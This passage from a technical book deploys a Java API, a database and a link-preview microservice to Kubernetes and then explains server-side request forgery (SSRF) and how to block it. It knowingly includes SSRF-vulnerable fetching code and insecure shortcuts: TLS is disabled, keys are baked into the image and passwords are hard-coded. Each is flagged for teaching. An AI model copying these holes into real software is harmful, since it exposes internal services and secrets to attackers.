terminal shell. You should specify version 1.16.2 of Kubernetes to ensure compatibility
with the examples in this book. Some of the examples require Minikube to be run-
ning with at least 4GB of RAM, so use the --memory flag to specify that.
minikube start \
  --kubernetes-version=1.16.2 \
  --memory=4096
You should then run
eval $(minikube docker-env)
so that any subsequent Docker commands in the same console instance will use Mini-
kube’s Docker daemon. This ensures Kubernetes will be able to find the images with-
out needing to access an external repository. If you open a new terminal window,
make sure to run this command again to set the environment correctly.
LEARN ABOUT IT
Typically in a production deployment, you’d configure your
DevOps pipeline to automatically push Docker images to a repository after
they have been thoroughly tested and scanned for known vulnerabilities.
Setting up such a workflow is outside the scope of this book but is covered
in detail in Securing DevOps by Julien Vehent (Manning, 2018; http://mng
.bz/qN52).
You can now build the H2 Docker image by typing the following commands in the
same shell:
cd docker/h2
docker build -t apisecurityinaction/h2database .
This may take a long time to run the first time because it must download the base
images, which are quite large. Subsequent builds will be faster because the images are
cached locally. To test the image, you can run the following command and check that
you see the expected output:
$ docker run apisecurityinaction/h2database
TCP server running at tcp://172.17.0.5:9092 (others can connect)
If you want to stop the container press Ctrl-C.
TIP
If you want to try connecting to the database server, be aware that the IP
address displayed is for Minikube’s internal virtual networking and is usually
not directly accessible. Run the command minikube ip at the prompt to get
an IP address you can use to connect from the host OS.
10.2.2 Deploying the database to Kubernetes
To deploy the database to the Kubernetes cluster, you’ll need to create some configu-
ration files describing how it is to be deployed. But before you do that, an important
first step is to create a separate Kubernetes namespace to hold all pods and services
related to the Natter API. A namespace provides a level of isolation when unrelated
services need to run on the same cluster and makes it easier to apply other security
policies such as the networking policies that you’ll apply in section 10.3. Kubernetes
provides several ways to configure objects in the cluster, including namespaces, but it’s
a good idea to use declarative configuration files so that you can check these into Git
or another version-control system, making it easier to review and manage security con-
figuration over time. Listing 10.2 shows the configuration needed to create a new
namespace for the Natter API. Navigate to the root folder of the Natter API project
and create a new sub-folder named “kubernetes.” Then inside the folder, create a new
file named natter-namespace.yaml with the contents of listing 10.2. The file tells
Kubernetes to make sure that a namespace exists with the name natter-api and a
matching label.
WARNING
YAML (https://yaml.org) configuration files are sensitive to inden-
tation and other whitespace. Make sure you copy the file exactly as it is in the
listing. You may prefer to download the finished files from the GitHub repos-
itory accompanying the book (http://mng.bz/7Gly).
Listing 10.2 Creating the namespace

# Use the Namespace kind to create a namespace.
apiVersion: v1
kind: Namespace
metadata:
  # Specify a name and label for the namespace.
  name: natter-api
  labels:
    name: natter-api

NOTE
Kubernetes configuration files are versioned using the apiVersion
attribute. The exact version string depends on the type of resource and version
of the Kubernetes software you're using. Check the Kubernetes documentation
(https://kubernetes.io/docs/home/) for the correct apiVersion when writing
a new configuration file.
To create the namespace, run the following command in your terminal in the root
folder of the natter-api project:
kubectl apply -f kubernetes/natter-namespace.yaml
The kubectl apply command instructs Kubernetes to make changes to the cluster to
match the desired state specified in the configuration file. You’ll use the same com-
mand to create all the Kubernetes objects in this chapter. To check that the name-
space is created, use the kubectl get namespaces command:
$ kubectl get namespaces
Your output will look similar to the following:
NAME STATUS AGE
default Active 2d6h
kube-node-lease Active 2d6h
kube-public Active 2d6h
kube-system Active 2d6h
natter-api Active 6s
You can now create the pod to run the H2 database container you built in the last sec-
tion. Rather than creating the pod directly, you’ll instead create a deployment, which
describes which pods to run, how many copies of the pod to run, and the security attri-
butes to apply to those pods. Listing 10.3 shows a deployment configuration for the
H2 database with a basic set of security annotations to restrict the permissions of the
pod in case it ever gets compromised. First you define the name and namespace to
run the deployment in, making sure to use the namespace that you defined earlier. A
deployment specifies the pods to run by using a selector that defines a set of labels that
matching pods will have. In listing 10.3, you define the pod in the template section of
the same file, so make sure the labels are the same in both parts.
NOTE
Because you are using an image that you built directly to the Minikube
Docker daemon, you need to specify imagePullPolicy: Never in the con-
tainer specification to prevent Kubernetes trying to pull the image from a
repository. In a real deployment, you would have a repository, so you’d
remove this setting.
You can also specify a set of standard security attributes in the securityContext section
for both the pod and for individual containers, as shown in the listing. In this case, the
definition ensures that all containers in the pod run as a non-root user, and that it is not
possible to bypass the default permissions by setting the following properties:
runAsNonRoot: true ensures that the container is not accidentally run as the
root user. The root user inside a container is the root user on the host OS and
can sometimes escape from the container.
allowPrivilegeEscalation: false ensures that no process run inside the con-
tainer can have more privileges than the initial user. This prevents the con-
tainer executing files marked with set-UID attributes that run as a different
user, such as root.
readOnlyRootFilesystem: true makes the entire filesystem inside the container
read-only, preventing an attacker from altering any system files. If your container
needs to write files, you can mount a separate persistent storage volume.
capabilities: drop: - all removes all Linux capabilities assigned to the container.
This ensures that if an attacker does gain root access, they are severely limited in
what they can do. Linux capabilities are subsets of full root privileges and are
unrelated to the capabilities you used in chapter 9.
LEARN ABOUT IT
For more information on configuring the security context of a
pod, refer to http://mng.bz/mN12. In addition to the basic attributes specified
here, you can enable more advanced sandboxing features such as AppArmor,
SELinux, or seccomp. These features are beyond the scope of this book. A start-
ing point to learn more is the Kubernetes Security Best Practices talk given by Ian Lewis
at Container Camp 2018 (https://www.youtube.com/watch?v=v6a37uzFrCw).
Create a file named natter-database-deployment.yaml in the kubernetes folder with
the contents of listing 10.3 and save the file.
Listing 10.3 The database deployment

apiVersion: apps/v1
kind: Deployment
metadata:
  # Give the deployment a name and ensure it runs
  # in the natter-api namespace.
  name: natter-database-deployment
  namespace: natter-api
spec:
  # Select which pods are in the deployment.
  selector:
    matchLabels:
      app: natter-database
  # Specify how many copies of the pod to run on the cluster.
  replicas: 1
  template:
    metadata:
      labels:
        app: natter-database
    spec:
      # Specify a security context to limit permissions
      # inside the containers.
      securityContext:
        runAsNonRoot: true
      containers:
        - name: natter-database
          # Tell Kubernetes the name of the Docker image to run.
          image: apisecurityinaction/h2database:latest
          # Ensure that Kubernetes uses the local image rather
          # than trying to pull one from a repository.
          imagePullPolicy: Never
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            capabilities:
              drop:
                - all
          ports:
            - containerPort: 9092
Run kubectl apply -f kubernetes/natter-database-deployment.yaml in the natter-
api root folder to deploy the application.
To check that your pod is now running, you can run the following command:
$ kubectl get deployments --namespace=natter-api
This will result in output like the following:
NAME READY UP-TO-DATE AVAILABLE AGE
natter-database-deployment 1/1 1 1 10s
You can then check on individual pods in the deployment by running the following
command
$ kubectl get pods --namespace=natter-api
which outputs a status report like this one, although the pod name will be different
because Kubernetes generates these randomly:
NAME READY STATUS RESTARTS AGE
natter-database-deployment-8649d65665-d58wb 1/1 Running 0 16s
Although the database is now running in a pod, pods are designed to be ephemeral
and can come and go over the lifetime of the cluster. To provide a stable reference for
other pods to connect to, you need to also define a Kubernetes service. A service pro-
vides a stable internal IP address and DNS name that other pods can use to connect to
the service. Kubernetes will route these requests to an available pod that implements
the service. Listing 10.4 shows the service definition for the database.
First you need to give the service a name and ensure that it runs in the natter-api
namespace. You define which pods are used to implement the service by defining a
selector that matches the label of the pods defined in the deployment. In this case,
you used the label app: natter-database when you defined the deployment, so use
the same label here to make sure the pods are found. Finally, you tell Kubernetes
which ports to expose for the service. In this case, you can expose port 9092. When a
pod tries to connect to the service on port 9092, Kubernetes will forward the request
to the same port on one of the pods that implements the service. If you want to use a
different port, you can use the targetPort attribute to create a mapping between the
service port and the port exposed by the pods. Create a new file named
natter-database-service.yaml in the kubernetes folder with the contents of listing 10.4.
Listing 10.4 The database service

apiVersion: v1
kind: Service
metadata:
  # Give the service a name in the natter-api namespace.
  name: natter-database-service
  namespace: natter-api
spec:
  # Select the pods that implement the service using labels.
  selector:
    app: natter-database
  # Expose the database server port to other pods.
  ports:
    - protocol: TCP
      port: 9092
Run
kubectl apply -f kubernetes/natter-database-service.yaml
to configure the service.
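If you did want the service port to differ from the container port, a sketch of the mapping would look like the following; this isn't needed for the Natter database, where both ports are 9092:

ports:
  - protocol: TCP
    port: 9000          # the port clients connect to on the service
    targetPort: 9092    # the port the pods actually listen on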
Pop quiz

3 Which of the following are best practices for securing containers in Kubernetes?
Select all answers that apply.
  a Running as a non-root user
  b Disallowing privilege escalation
  c Dropping all unused Linux capabilities
  d Marking the root filesystem as read-only
  e Using base images with the most downloads on Docker Hub
  f Applying sandboxing features such as AppArmor or seccomp

The answer is at the end of the chapter.

10.2.3 Building the Natter API as a Docker container
For building the Natter API container, you can avoid writing a Dockerfile manually
and make use of one of the many Maven plugins that will do this for you automatically.
In this chapter, you'll use the Jib plugin from Google
(https://github.com/GoogleContainerTools/jib), which requires a minimal amount
of configuration to build a container image.
Listing 10.5 shows how to configure the jib-maven-plugin to build a Docker container
image for the Natter API. Open the pom.xml file in your editor and add the
whole build section from listing 10.5 to the bottom of the file just before the closing
</project> tag. The configuration instructs Maven to include the Jib plugin in the
build process and sets several configuration options:
Set the name of the output Docker image to build to “apisecurityinaction/
natter-api.”
Set the name of the base image to use. In this case, you can use the distroless Java
11 image provided by Google, just as you did for the H2 Docker image.
Set the name of the main class to run when the container is launched. If there is
only one main method in your project, then you can leave this out.
Configure any additional JVM settings to use when starting the process. The
default settings are fine, but as discussed in chapter 5, it is worth telling Java to
prefer to use the /dev/urandom device for seeding SecureRandom instances to
avoid potential performance issues. You can do this by setting the java.security
.egd system property.
Configure the container to expose port 4567, which is the default port that our
API server will listen to for HTTP connections.
Finally, configure the container to run processes as a non-root user and group.
In this case you can use a user with UID (user ID) and GID (group ID) of 1000.
Listing 10.5 Enabling the Jib Maven plugin

<build>
  <plugins>
    <plugin>
      <groupId>com.google.cloud.tools</groupId>
      <artifactId>jib-maven-plugin</artifactId>
      <!-- Use the latest version of the jib-maven-plugin -->
      <version>2.4.0</version>
      <configuration>
        <!-- Provide a name for the generated Docker image -->
        <to>
          <image>apisecurityinaction/natter-api</image>
        </to>
        <!-- Use a minimal base image to reduce the size
             and attack surface -->
        <from>
          <image>gcr.io/distroless/java:11</image>
        </from>
        <container>
          <!-- Specify the main class to run -->
          <mainClass>${exec.mainClass}</mainClass>
          <!-- Add any custom JVM settings -->
          <jvmFlags>
            <jvmFlag>-Djava.security.egd=file:/dev/urandom</jvmFlag>
          </jvmFlags>
          <!-- Expose the port that the API server listens to
               so that clients can connect -->
          <ports>
            <port>4567</port>
          </ports>
          <!-- Specify a non-root user and group to run the process -->
          <user>1000:1000</user>
        </container>
      </configuration>
    </plugin>
  </plugins>
</build>
Before you build the Docker image, you should first disable TLS because this avoids
configuration issues that will need to be resolved to get TLS working in the cluster.
You will learn how to re-enable TLS between microservices in section 10.3. Open
Main.java in your editor and find the call to the secure() method. Comment out (or
delete) the method call as follows:
//secure("localhost.p12", "changeit", null, null);
The API will still need access to the keystore for any HMAC or AES encryption keys. To
ensure that the keystore is copied into the Docker image, navigate to the src/main
folder in the project and create a new folder named “jib.” Copy the keystore.p12 file
from the root of the project to the src/main/jib folder you just created. The jib-maven-
plugin will automatically copy files in this folder into the Docker image it creates.
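Assuming you're working in the project's root folder and the keystore from earlier chapters is named keystore.p12, that amounts to:

mkdir -p src/main/jib
cp keystore.p12 src/main/jib/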
WARNING
Copying the keystore and keys directly into the Docker image is
poor security because anyone who downloads the image can access your
secret keys. In chapter 11, you’ll see how to avoid including the keystore in
this way and ensure that you use unique keys for each environment that your
API runs in.
You also need to change the JDBC URL that the API uses to connect to the database.
Rather than creating a local in-memory database, you can instruct the API to connect
to the H2 database service you just deployed. To avoid having to create a disk volume
to store data files, in this example you’ll continue using an in-memory database run-
ning on the database pod. This is as simple as replacing the current JDBC database
URL with the following one, using the DNS name of the database service you cre-
ated earlier:
jdbc:h2:tcp://natter-database-service:9092/mem:natter
Open the Main.java file and replace the existing JDBC URL with the new one in the
code that creates the database connection pool. The new code should look as shown
in listing 10.6.
Listing 10.6 Connecting to the remote H2 database

// Use the DNS name of the remote database service.
var jdbcUrl =
    "jdbc:h2:tcp://natter-database-service:9092/mem:natter";

// Use the same JDBC URL when creating the schema and when
// switching to the Natter API user.
var datasource = JdbcConnectionPool.create(
    jdbcUrl, "natter", "password");
createTables(datasource.getConnection());
datasource = JdbcConnectionPool.create(
    jdbcUrl, "natter_api_user", "password");
var database = Database.forDataSource(datasource);
To build the Docker image for the Natter API with Jib, you can then simply run the fol-
lowing Maven command in the same shell in the root folder of the natter-api project:
mvn clean compile jib:dockerBuild
You can now create a deployment to run the API in the cluster. Listing 10.7 shows the
deployment configuration, which is almost identical to the H2 database deployment
you created in the last section. Apart from specifying a different Docker image to run,
you should also make sure you attach a different label to the pods that form this
deployment. Otherwise, the new pods will be included in the database deployment.
Create a new file named natter-api-deployment.yaml in the kubernetes folder with the
contents of the listing.
Listing 10.7 The Natter API deployment

apiVersion: apps/v1
kind: Deployment
metadata:
  # Give the API deployment a unique name.
  name: natter-api-deployment
  namespace: natter-api
spec:
  # Ensure the labels for the pods are different
  # from the database pod labels.
  selector:
    matchLabels:
      app: natter-api
  replicas: 1
  template:
    metadata:
      labels:
        app: natter-api
    spec:
      securityContext:
        runAsNonRoot: true
      containers:
        - name: natter-api
          # Use the Docker image that you built with Jib.
          image: apisecurityinaction/natter-api:latest
          imagePullPolicy: Never
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            capabilities:
              drop:
                - all
          # Expose the port that the server runs on.
          ports:
            - containerPort: 4567
Run the following command to deploy the code:
kubectl apply -f kubernetes/natter-api-deployment.yaml
The API server will start and connect to the database service.
The last step is to also expose the API as a service within Kubernetes so that you
can connect to it. For the database service, you didn’t specify a service type so Kuber-
netes deployed it using the default ClusterIP type. Such services are only accessible
within the cluster, but you want the API to be accessible from external clients, so you
need to pick a different service type. The simplest alternative is the NodePort service
type, which exposes the service on a port on each node in the cluster. You can then
connect to the service using the external IP address of any node in the cluster.
Use the nodePort attribute to specify which port the service is exposed on, or leave
it blank to let the cluster pick a free port. The exposed port must be in the range
30000–32767. In section 10.4, you’ll deploy an ingress controller for a more controlled
approach to allowing connections from external clients. Create a new file named
natter-api-service.yaml in the kubernetes folder with the contents of listing 10.8.
Listing 10.8 Exposing the API as a service

apiVersion: v1
kind: Service
metadata:
  name: natter-api-service
  namespace: natter-api
spec:
  # Specify the type as NodePort to allow external connections.
  type: NodePort
  selector:
    app: natter-api
  ports:
    - protocol: TCP
      port: 4567
      # The port to expose on each node; it must be
      # in the range 30000-32767.
      nodePort: 30567
Now run the command kubectl apply -f kubernetes/natter-api-service.yaml to
start the service. You can then run the following to get a URL that you can use with
curl to interact with the service:
$ minikube service --url natter-api-service --namespace=natter-api
This will produce output like the following:
http://192.168.99.109:30567
You can then use that URL to access the API as in the following example:
$ curl -X POST -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
http://192.168.99.109:30567/users
{"username":"test"}
You now have the API running in Kubernetes.
10.2.4 The link-preview microservice
You have Docker images for the Natter API and the H2 database deployed and run-
ning in Kubernetes, so it’s now time to develop the link-preview microservice. To sim-
plify development, you can create the new microservice within the existing Maven
project and reuse the existing classes.
NOTE
The implementation in this chapter is extremely naïve from a perfor-
mance and scalability perspective and is intended only to demonstrate API
security techniques within Kubernetes.
To implement the service, you can use the jsoup library (https://jsoup.org) for Java,
which simplifies fetching and parsing HTML pages. To include jsoup in the project,
open the pom.xml file in your editor and add the following lines to the
<dependencies> section:

<dependency>
  <groupId>org.jsoup</groupId>
  <artifactId>jsoup</artifactId>
  <version>1.13.1</version>
</dependency>
An implementation of the microservice is shown in listing 10.9. The API exposes a sin-
gle operation, implemented as a GET request to the /preview endpoint with the URL
from the link as a query parameter. You can use jsoup to fetch the URL and parse the
HTML that is returned. Jsoup does a good job of ensuring the URL is a valid HTTP or
HTTPS URL, so you can skip performing those checks yourself and instead register
Spark exception handlers to return an appropriate response if the URL is invalid or
cannot be fetched for any reason.
WARNING
If you process URLs in this way, you should ensure that an attacker
can’t submit file:// URLs and use this to access protected files on the API
server disk. Jsoup strictly validates that the URL scheme is HTTP before load-
ing any resources, but if you use a different library you should check the doc-
umentation or perform your own validation.
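If you do need to perform that validation yourself, a minimal check might look like the following sketch; validateUrlScheme is a hypothetical helper (assuming the java.net.URI and java.util.Set imports), not part of the book's implementation:

// Reject any URL whose scheme isn't plain HTTP(S), such as file: or ftp:.
private static void validateUrlScheme(String url) {
    var scheme = URI.create(url).getScheme();
    if (scheme == null ||
            !Set.of("http", "https").contains(scheme.toLowerCase())) {
        throw new IllegalArgumentException("URL must be http or https");
    }
}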
After jsoup fetches the HTML page, you can use the selectFirst method to find
metadata tags in the document. In this case, you’re interested in the following tags:
The document title.
The Open Graph description property, if it exists. This is represented in the
HTML as a <meta> tag with the property attribute set to og:description.
The Open Graph image property, which will provide a link to a thumbnail
image to accompany the preview.
You can also use the doc.location() method to find the URL that the document was
finally fetched from just in case any redirects occurred. Navigate to the src/main/
java/com/manning/apisecurityinaction folder and create a new file named
LinkPreviewer.java. Copy the contents of listing 10.9 into the file and save it.
WARNING
This implementation is vulnerable to server-side request forgery (SSRF)
attacks. You’ll mitigate these issues in section 10.2.7.
Listing 10.9 The link-preview microservice

package com.manning.apisecurityinaction;

import java.net.*;

import org.json.JSONObject;
import org.jsoup.Jsoup;
import org.slf4j.*;

import spark.ExceptionHandler;

import static spark.Spark.*;

public class LinkPreviewer {
    private static final Logger logger =
            LoggerFactory.getLogger(LinkPreviewer.class);

    public static void main(String...args) {
        // Because this service will only be called by other services,
        // you can omit the browser security headers.
        afterAfter((request, response) -> {
            response.type("application/json; charset=utf-8");
        });

        get("/preview", (request, response) -> {
            var url = request.queryParams("url");
            var doc = Jsoup.connect(url).timeout(3000).get();

            // Extract metadata properties from the HTML.
            var title = doc.title();
            var desc = doc.head()
                    .selectFirst("meta[property='og:description']");
            var img = doc.head()
                    .selectFirst("meta[property='og:image']");

            // Produce a JSON response, taking care with attributes
            // that might be null.
            return new JSONObject()
                    .put("url", doc.location())
                    .putOpt("title", title)
                    .putOpt("description",
                            desc == null ? null : desc.attr("content"))
                    .putOpt("image",
                            img == null ? null : img.attr("content"));
        });

        // Return appropriate HTTP status codes if jsoup
        // raises an exception.
        exception(IllegalArgumentException.class, handleException(400));
        exception(MalformedURLException.class, handleException(400));
        exception(Exception.class, handleException(502));
        exception(UnknownHostException.class, handleException(404));
    }

    private static <T extends Exception> ExceptionHandler<T>
            handleException(int status) {
        return (ex, request, response) -> {
            logger.error("Caught error {} - returning status {}",
                    ex, status);
            response.status(status);
            response.body(new JSONObject()
                    .put("status", status).toString());
        };
    }
}
10.2.5 Deploying the new microservice
To deploy the new microservice to Kubernetes, you need to first build the link-preview
microservice as a Docker image, and then create a new Kubernetes deployment and
service configuration for it. You can reuse the existing jib-maven-plugin to build the
Docker image, overriding the image name and main class on the command line.
Open a terminal in the root folder of the Natter API project and run the following
commands to build the image to the Minikube Docker daemon. First, ensure the envi-
ronment is configured correctly by running:
eval $(minikube docker-env)
Then use Jib to build the image for the link-preview service:
mvn clean compile jib:dockerBuild \
  -Djib.to.image=apisecurityinaction/link-preview-service \
  -Djib.container.mainClass=com.manning.apisecurityinaction.LinkPreviewer
You can then deploy the service to Kubernetes by applying a deployment configura-
tion, as shown in listing 10.10. This is a copy of the deployment configuration used for
the main Natter API, with the pod names changed and updated to use the Docker
image that you just built. Create a new file named kubernetes/natter-link-preview-
deployment.yaml using the contents of listing 10.10.
Listing 10.10 The link-preview service deployment

apiVersion: apps/v1
kind: Deployment
metadata:
  name: link-preview-service-deployment
  namespace: natter-api
spec:
  selector:
    matchLabels:
      # Give the pods the name link-preview-service.
      app: link-preview-service
  replicas: 1
  template:
    metadata:
      labels:
        app: link-preview-service
    spec:
      securityContext:
        runAsNonRoot: true
      containers:
        - name: link-preview-service
          # Use the link-preview-service Docker image you just built.
          image: apisecurityinaction/link-preview-service:latest
          imagePullPolicy: Never
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            capabilities:
              drop:
                - all
          ports:
            - containerPort: 4567
Run the following command to create the new deployment:
kubectl apply -f \
kubernetes/natter-link-preview-deployment.yaml
To allow the Natter API to locate the new service, you should also create a new Kuber-
netes service configuration for it. Listing 10.11 shows the configuration for the new
service, selecting the pods you just created and exposing port 4567 to allow access to
the API. Create the file kubernetes/natter-link-preview-service.yaml with the contents
of the new listing.
Listing 10.11 The link-preview service configuration

apiVersion: v1
kind: Service
metadata:
  # Give the service a name.
  name: natter-link-preview-service
  namespace: natter-api
spec:
  selector:
    # Make sure to use the matching label for the deployment pods.
    app: link-preview-service
  ports:
    # Expose port 4567 that the API will run on.
    - protocol: TCP
      port: 4567
Run the following command to expose the service within the cluster:
kubectl apply -f kubernetes/natter-link-preview-service.yaml
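To check that the service is reachable from inside the cluster, you can call it from a throwaway pod. This is a sketch of a smoke test rather than one of the book's steps; it assumes the busybox image and a URL that the link-preview service can fetch:

kubectl run -it --rm --restart=Never smoke-test \
  --namespace=natter-api --image=busybox:1.32 -- \
  wget -q -O - \
  'http://natter-link-preview-service:4567/preview?url=https://manning.com'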
10.2.6 Calling the link-preview microservice
The ideal place to call the link-preview service is when a message is initially posted to the
Natter API. The preview data can then be stored in the database along with the message
and served up to all users. For simplicity, you can instead call the service when reading a
message. This is very inefficient because the preview will be regenerated every time the
message is read, but it is convenient for the purpose of demonstration.
The code to call the link-preview microservice is shown in listing 10.12. Open the
SpaceController.java file and add the following imports to the top:
import java.net.*;
import java.net.http.*;
import java.net.http.HttpResponse.BodyHandlers;
import java.nio.charset.StandardCharsets;
import java.util.*;
import java.util.regex.Pattern;
Then add the fields and new method defined in the listing. The new method takes
a link, extracted from a message, and calls the link-preview service passing the link
URL as a query parameter. If the response is successful, then it returns the link-
preview JSON.
Listing 10.12 Fetching a link preview

// Construct an HttpClient and a constant for the microservice URI.
private final HttpClient httpClient = HttpClient.newHttpClient();
private final URI linkPreviewService = URI.create(
        "http://natter-link-preview-service:4567");

private JSONObject fetchLinkPreview(String link) {
    var url = linkPreviewService.resolve("/preview?url=" +
            URLEncoder.encode(link, StandardCharsets.UTF_8));
    var request = HttpRequest.newBuilder(url)   // Create a GET request to the service, passing the link as the url query parameter.
            .GET()
            .build();
    try {
        var response = httpClient.send(request,
                BodyHandlers.ofString());
        if (response.statusCode() == 200) {     // If the response is successful, then return the JSON link preview.
            return new JSONObject(response.body());
        }
    } catch (Exception ignored) { }
    return null;
}
To return the links from the Natter API, you need to update the Message class used to
represent a message read from the database. In the SpaceController.java file, find the
Message class definition and update it to add a new links field containing a list of link
previews, as shown in listing 10.13.
TIP If you haven't added support for reading messages to the Natter API, you can download a fully implemented API from the GitHub repository accompanying the book: https://github.com/NeilMadden/apisecurityinaction. Check out the chapter10 branch for a starting point, or chapter10-end for the completed code.
Listing 10.13 Adding links to a message

public static class Message {
    private final long spaceId;
    private final long msgId;
    private final String author;
    private final Instant time;
    private final String message;
    private final List<JSONObject> links = new ArrayList<>();   // Add a list of link previews to the class.

    public Message(long spaceId, long msgId, String author,
            Instant time, String message) {
        this.spaceId = spaceId;
        this.msgId = msgId;
        this.author = author;
        this.time = time;
        this.message = message;
    }
    @Override
    public String toString() {
        JSONObject msg = new JSONObject();
        msg.put("uri",
                "/spaces/" + spaceId + "/messages/" + msgId);
        msg.put("author", author);
        msg.put("time", time.toString());
        msg.put("message", message);
        msg.put("links", links);   // Return the links as a new field on the message response.
        return msg.toString();
    }
}
Finally, you can update the readMessage method to scan the text of a message for
strings that look like URLs and fetch a link preview for those links. You can use a
regular expression to search for potential links in the message. In this case, you'll
just look for any strings that start with http:// or https://, as shown in listing 10.14.
Once a potential link has been found, you can use the fetchLinkPreview method
you just wrote to fetch the link preview. If the link was valid and a preview was
returned, then add the preview to the list of links on the message. Update the
readMessage method in the SpaceController.java file to match listing 10.14.
Listing 10.14 Scanning messages for links

public Message readMessage(Request request, Response response) {
    var spaceId = Long.parseLong(request.params(":spaceId"));
    var msgId = Long.parseLong(request.params(":msgId"));

    var message = database.findUnique(Message.class,
            "SELECT space_id, msg_id, author, msg_time, msg_text " +
            "FROM messages WHERE msg_id = ? AND space_id = ?",
            msgId, spaceId);

    var linkPattern = Pattern.compile("https?://\\S+");   // Use a regular expression to find links in the message.
    var matcher = linkPattern.matcher(message.message);
    int start = 0;
    while (matcher.find(start)) {
        var url = matcher.group();
        var preview = fetchLinkPreview(url);   // Send each link to the link-preview service.
        if (preview != null) {
            message.links.add(preview);        // If it was valid, then add the link preview to the links list in the message.
        }
        start = matcher.end();
    }

    response.status(200);
    return message;
}
You can now rebuild the Docker image by running the following command in a termi-
nal in the root folder of the project (make sure to set up the Docker environment
again if this is a new terminal window):
mvn clean compile jib:dockerBuild
Because the image is not versioned, Minikube won't automatically pick up the new
image. The simplest way to use the new image is to restart Minikube, which will reload
all the images from the Docker daemon:¹

minikube stop

and then

minikube start

¹ Restarting Minikube will also delete the contents of the database as it is still purely in-memory. See http://mng.bz/5pZ1 for details on how to enable persistent disk volumes that survive restarts.
You can now try out the link-preview service. Use the minikube ip command to get the
IP address to use to connect to the service. First create a user:
curl http://$(minikube ip):30567/users \
-H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}'
Next, create a social space and extract the message read-write capability URI into a
variable:
MSGS_URI=$(curl http://$(minikube ip):30567/spaces \
-H 'Content-Type: application/json' \
-d '{"owner":"test","name":"test space"}' \
-u test:password | jq -r '."messages-rw"')
You can now create a message with a link to an HTML story in it:
MSG_LINK=$(curl http://$(minikube ip):30567$MSGS_URI \
-u test:password \
-H 'Content-Type: application/json' \
-d '{"author":"test", "message":"Check out this link:
➥ http://www.bbc.co.uk/news/uk-scotland-50435811"}' | jq -r .uri)
Finally, you can retrieve the message to see the link preview:
curl -u test:password http://$(minikube ip):30567$MSG_LINK | jq
The output will look like the following:

{
  "author": "test",
  "links": [
    {
      "image": "https://ichef.bbci.co.uk/news/1024/branded_news/128FC/production/_109682067_brash_tracks_on_fire_dyke_2019.creditpaulturner.jpg",
      "description": "The massive fire in the Flow Country in May doubled Scotland's greenhouse gas emissions while it burnt.",
      "title": "Huge Flow Country wildfire 'doubled Scotland's emissions' - BBC News",
      "url": "https://www.bbc.co.uk/news/uk-scotland-50435811"
    }
  ],
  "time": "2019-11-18T10:11:24.944Z",
  "message": "Check out this link: http://www.bbc.co.uk/news/uk-scotland-50435811"
}
10.2.7 Preventing SSRF attacks
The link-preview service currently has a large security flaw, because it allows anybody
to submit a message with a link that will then be loaded from inside the Kubernetes
network. This opens the application up to a server-side request forgery (SSRF) attack,
where an attacker crafts a link that refers to an internal service that isn’t accessible
from outside the network, as shown in figure 10.4.
DEFINITION A server-side request forgery attack occurs when an attacker can submit URLs to an API that are then loaded from inside a trusted network. By submitting URLs that refer to internal IP addresses the attacker may be able to discover what services are running inside the network or even to cause side effects.
SSRF attacks can be devastating in some cases. For example, in July 2019, Capital One,
a large financial services company, announced a data breach that compromised user
details, Social Security numbers, and bank account numbers (http://mng.bz/6AmD).
Analysis of the attack (https://ejj.io/blog/capital-one) showed that the attacker
exploited an SSRF vulnerability in a Web Application Firewall to extract credentials
from the AWS metadata service, which is exposed as a simple HTTP server available
on the local network. These credentials were then used to access secure storage buck-
ets containing the user data.
Although the AWS metadata service was attacked in this case, it is far from the first
service to assume that requests from within an internal network are safe. This used to
be a common assumption for applications installed inside a corporate firewall, and
you can still find applications that will respond with sensitive data to completely unau-
thenticated HTTP requests. Even critical elements of the Kubernetes control plane,
such as the etcd database used to store cluster configuration and service credentials,
can sometimes be accessed via unauthenticated HTTP requests (although this is usu-
ally disabled). The best defense against SSRF attacks is to require authentication for
access to any internal services, regardless of whether the request originated from an
internal network: an approach known as zero trust networking.
DEFINITION A zero trust network architecture is one in which requests to services are not trusted purely because they come from an internal network. Instead, all API requests should be actively authenticated using techniques such as those described in this book. The term originated with Forrester Research and was popularized by Google's BeyondCorp enterprise architecture (https://cloud.google.com/beyondcorp/). The term has now become a marketing buzzword, with many products promising a zero-trust approach, but the core idea is still valuable.
Figure 10.4 In an SSRF attack, the attacker sends a URL to a vulnerable API that refers to an internal service. If the API doesn't validate the URL, it will make a request to the internal service that the attacker couldn't make themselves. This may allow the attacker to probe internal services for vulnerabilities, steal credentials returned from these endpoints, or directly cause actions via vulnerable APIs.

Although implementing a zero-trust approach throughout an organization is ideal, this can't always be relied upon, and a service such as the link-preview microservice shouldn't assume that all requests are safe. To prevent the link-preview service being abused for SSRF attacks, you should validate URLs passed to the service before making an HTTP request. This validation can be done in two ways:
- You can check the URLs against a set of allowed hostnames, domain names, or (ideally) strictly match the entire URL. Only URLs that match the allowlist are allowed. This approach is the most secure but is not always feasible; a small sketch of the hostname variant follows this list.
- You can block URLs that are likely to be internal services that should be protected. This is less secure than allowlisting for several reasons. First, you may forget to blocklist some services. Second, new services may be added later without the blocklist being updated. Blocklisting should only be used when allowlisting is not an option.
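To make the first option concrete, here is a minimal sketch of a hostname allowlist check. It is not part of the book's listings, and the hosts shown are placeholder values; a real deployment would match entire URLs where possible:

import java.net.URI;
import java.util.Set;

// A sketch of the allowlist approach: only allow HTTPS URLs whose host
// exactly matches a known-good set. The host values are examples only.
static boolean isAllowedUrl(String url) {
    var allowedHosts = Set.of("www.bbc.co.uk", "en.wikipedia.org");
    var uri = URI.create(url);
    return "https".equals(uri.getScheme())
            && uri.getHost() != null
            && allowedHosts.contains(uri.getHost().toLowerCase());
}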
For the link-preview microservice, there are too many legitimate websites to have a
hope of listing them all, so you'll fall back on a form of blocklisting: extract the hostname
from the URL and then check that the IP address does not resolve to a private
IP address. There are several classes of IP addresses that are never valid targets for a
link-preview service:

- Any loopback address, such as 127.0.0.1, which always refers to the local machine. Allowing requests to these addresses might allow access to other containers running in the same pod.
- Any link-local IP address, which are those starting 169.254 in IPv4 or fe80 in IPv6. These addresses are reserved for communicating with hosts on the same network segment.
